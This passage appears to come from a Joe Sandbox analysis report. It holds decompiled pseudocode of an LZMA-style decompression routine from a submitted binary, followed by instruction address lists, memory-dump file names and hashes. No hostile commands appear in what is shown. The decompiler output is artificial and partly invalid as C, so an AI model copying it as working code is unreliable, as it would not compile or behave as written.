                                                  													__ebx = __ebx + __ebx;
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  														__ecx =  *(__ebp - 0x10);
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  														__ebx = __ebx | 0x00000001;
                                                  														__eflags = __ebx;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L101:
                                                  														_t338 = __ebp - 0x48;
                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                  														__eflags =  *_t338;
                                                  														goto L102;
                                                  													} else {
                                                  														goto L99;
                                                  													}
                                                  												}
                                                  												__edx =  *(__ebp - 4);
                                                  												__eax = __eax - __ebx;
                                                  												 *(__ebp - 0x40) = __ecx;
                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  												goto L108;
                                                  											case 0x1a:
                                                  												L56:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1a;
                                                  													goto L170;
                                                  												}
                                                  												__ecx =  *(__ebp - 0x68);
                                                  												__al =  *(__ebp - 0x5c);
                                                  												__edx =  *(__ebp - 8);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *( *(__ebp - 0x68)) = __al;
                                                  												__ecx =  *(__ebp - 0x14);
                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                  												__eax = __ecx + 1;
                                                  												__edx = 0;
                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t192;
                                                  												goto L79;
                                                  											case 0x1b:
                                                  												L75:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													 *(__ebp - 0x88) = 0x1b;
                                                  													goto L170;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t274 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t274;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												_t283 = __ebp - 0x64;
                                                  												 *_t283 =  *(__ebp - 0x64) - 1;
                                                  												__eflags =  *_t283;
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												L79:
                                                  												 *(__ebp - 0x14) = __edx;
                                                  												goto L80;
                                                  											case 0x1c:
                                                  												while(1) {
                                                  													L123:
                                                  													__eflags =  *(__ebp - 0x64);
                                                  													if( *(__ebp - 0x64) == 0) {
                                                  														break;
                                                  													}
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__edx =  *(__ebp - 8);
                                                  													__cl =  *(__eax + __edx);
                                                  													__eax =  *(__ebp - 0x14);
                                                  													 *(__ebp - 0x5c) = __cl;
                                                  													 *(__eax + __edx) = __cl;
                                                  													__eax = __eax + 1;
                                                  													__edx = 0;
                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                  													__edx = _t414;
                                                  													__eax =  *(__ebp - 0x68);
                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  													__eflags =  *(__ebp - 0x30);
                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                  													 *(__ebp - 0x14) = _t414;
                                                  													if( *(__ebp - 0x30) > 0) {
                                                  														continue;
                                                  													} else {
                                                  														L80:
                                                  														 *(__ebp - 0x88) = 2;
                                                  														goto L1;
                                                  													}
                                                  												}
                                                  												 *(__ebp - 0x88) = 0x1c;
                                                  												goto L170;
                                                  										}
                                                  									}
                                                  									L171:
                                                  									_t544 = _t543 | 0xffffffff;
                                                  									goto L172;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					goto L1;
                                                  				}
                                                  			}














                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                  • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                  • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                  • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E0040711C() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				signed int _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t589;
                                                  				signed int* _t606;
                                                  				void* _t613;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t613 - 0x40) != 0) {
                                                  						 *(_t613 - 0x84) = 0xb;
                                                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                  						goto L132;
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x28);
                                                  						L88:
                                                  						 *(__ebp - 0x2c) = __eax;
                                                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  						L89:
                                                  						__eax =  *(__ebp - 4);
                                                  						 *(__ebp - 0x80) = 0x15;
                                                  						__eax =  *(__ebp - 4) + 0xa68;
                                                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  						L69:
                                                  						 *(__ebp - 0x84) = 0x12;
                                                  						while(1) {
                                                  							L132:
                                                  							 *(_t613 - 0x54) = _t606;
                                                  							while(1) {
                                                  								L133:
                                                  								_t531 =  *_t606;
                                                  								_t589 = _t531 & 0x0000ffff;
                                                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  								if( *(_t613 - 0xc) >= _t565) {
                                                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  									 *(_t613 - 0x40) = 1;
                                                  									_t532 = _t531 - (_t531 >> 5);
                                                  									 *_t606 = _t532;
                                                  								} else {
                                                  									 *(_t613 - 0x10) = _t565;
                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  								}
                                                  								if( *(_t613 - 0x10) >= 0x1000000) {
                                                  									goto L139;
                                                  								}
                                                  								L137:
                                                  								if( *(_t613 - 0x6c) == 0) {
                                                  									 *(_t613 - 0x88) = 5;
                                                  									L170:
                                                  									_t568 = 0x22;
                                                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                  									_t535 = 0;
                                                  									L172:
                                                  									return _t535;
                                                  								}
                                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  								L139:
                                                  								_t533 =  *(_t613 - 0x84);
                                                  								while(1) {
                                                  									 *(_t613 - 0x88) = _t533;
                                                  									while(1) {
                                                  										L1:
                                                  										_t534 =  *(_t613 - 0x88);
                                                  										if(_t534 > 0x1c) {
                                                  											break;
                                                  										}
                                                  										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                  											case 0:
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  												_t534 =  *( *(_t613 - 0x70));
                                                  												if(_t534 > 0xe1) {
                                                  													goto L171;
                                                  												}
                                                  												_t538 = _t534 & 0x000000ff;
                                                  												_push(0x2d);
                                                  												asm("cdq");
                                                  												_pop(_t570);
                                                  												_push(9);
                                                  												_pop(_t571);
                                                  												_t609 = _t538 / _t570;
                                                  												_t540 = _t538 % _t570 & 0x000000ff;
                                                  												asm("cdq");
                                                  												_t604 = _t540 % _t571 & 0x000000ff;
                                                  												 *(_t613 - 0x3c) = _t604;
                                                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                  													L10:
                                                  													if(_t612 == 0) {
                                                  														L12:
                                                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  														goto L15;
                                                  													} else {
                                                  														goto L11;
                                                  													}
                                                  													do {
                                                  														L11:
                                                  														_t612 = _t612 - 1;
                                                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                  													} while (_t612 != 0);
                                                  													goto L12;
                                                  												}
                                                  												if( *(_t613 - 4) != 0) {
                                                  													GlobalFree( *(_t613 - 4));
                                                  												}
                                                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  												 *(_t613 - 4) = _t534;
                                                  												if(_t534 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                  													goto L10;
                                                  												}
                                                  											case 1:
                                                  												L13:
                                                  												__eflags =  *(_t613 - 0x6c);
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													 *(_t613 - 0x88) = 1;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  												_t45 = _t613 - 0x48;
                                                  												 *_t45 =  *(_t613 - 0x48) + 1;
                                                  												__eflags =  *_t45;
                                                  												L15:
                                                  												if( *(_t613 - 0x48) < 4) {
                                                  													goto L13;
                                                  												}
                                                  												_t546 =  *(_t613 - 0x40);
                                                  												if(_t546 ==  *(_t613 - 0x74)) {
                                                  													L20:
                                                  													 *(_t613 - 0x48) = 5;
                                                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  													goto L23;
                                                  												}
                                                  												 *(_t613 - 0x74) = _t546;
                                                  												if( *(_t613 - 8) != 0) {
                                                  													GlobalFree( *(_t613 - 8));
                                                  												}
                                                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  												 *(_t613 - 8) = _t534;
                                                  												if(_t534 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													goto L20;
                                                  												}
                                                  											case 2:
                                                  												L24:
                                                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  												 *(_t613 - 0x84) = 6;
                                                  												 *(_t613 - 0x4c) = _t553;
                                                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                  												L132:
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											case 3:
                                                  												L21:
                                                  												__eflags =  *(_t613 - 0x6c);
                                                  												if( *(_t613 - 0x6c) == 0) {
                                                  													 *(_t613 - 0x88) = 3;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  												_t67 = _t613 - 0x70;
                                                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  												__eflags =  *_t67;
                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  												L23:
                                                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  												if( *(_t613 - 0x48) != 0) {
                                                  													goto L21;
                                                  												}
                                                  												goto L24;
                                                  											case 4:
                                                  												L133:
                                                  												_t531 =  *_t606;
                                                  												_t589 = _t531 & 0x0000ffff;
                                                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  												if( *(_t613 - 0xc) >= _t565) {
                                                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  													 *(_t613 - 0x40) = 1;
                                                  													_t532 = _t531 - (_t531 >> 5);
                                                  													 *_t606 = _t532;
                                                  												} else {
                                                  													 *(_t613 - 0x10) = _t565;
                                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  												}
                                                  												if( *(_t613 - 0x10) >= 0x1000000) {
                                                  													goto L139;
                                                  												}
                                                  											case 5:
                                                  												goto L137;
                                                  											case 6:
                                                  												__edx = 0;
                                                  												__eflags =  *(__ebp - 0x40);
                                                  												if( *(__ebp - 0x40) != 0) {
                                                  													__eax =  *(__ebp - 4);
                                                  													__ecx =  *(__ebp - 0x38);
                                                  													 *(__ebp - 0x34) = 1;
                                                  													 *(__ebp - 0x84) = 7;
                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  													while(1) {
                                                  														L132:
                                                  														 *(_t613 - 0x54) = _t606;
                                                  														goto L133;
                                                  													}
                                                  												}
                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  												__esi =  *(__ebp - 0x60);
                                                  												__cl = 8;
                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  												__ecx =  *(__ebp - 0x3c);
                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  												__ecx =  *(__ebp - 4);
                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  												if( *(__ebp - 0x38) >= 4) {
                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                  														_t98 = __ebp - 0x38;
                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                  														__eflags =  *_t98;
                                                  													} else {
                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  													}
                                                  												} else {
                                                  													 *(__ebp - 0x38) = 0;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                  												if( *(__ebp - 0x34) == __edx) {
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													goto L61;
                                                  												} else {
                                                  													__eax =  *(__ebp - 0x14);
                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                  														__eflags = __eax;
                                                  													}
                                                  													__ecx =  *(__ebp - 8);
                                                  													__ebx = 0;
                                                  													__ebx = 1;
                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  													goto L41;
                                                  												}
                                                  											case 7:
                                                  												__eflags =  *(__ebp - 0x40) - 1;
                                                  												if( *(__ebp - 0x40) != 1) {
